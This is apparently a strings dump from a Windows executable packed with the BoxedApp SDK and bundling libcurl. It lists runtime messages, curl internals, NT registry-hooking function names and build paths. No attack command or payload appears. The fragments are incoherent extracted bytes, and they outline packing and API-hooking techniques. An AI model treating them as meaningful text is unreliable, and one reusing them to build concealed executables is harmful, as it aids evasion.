%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
1399780752 312
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
0@.idata
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
ftp@example.com
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
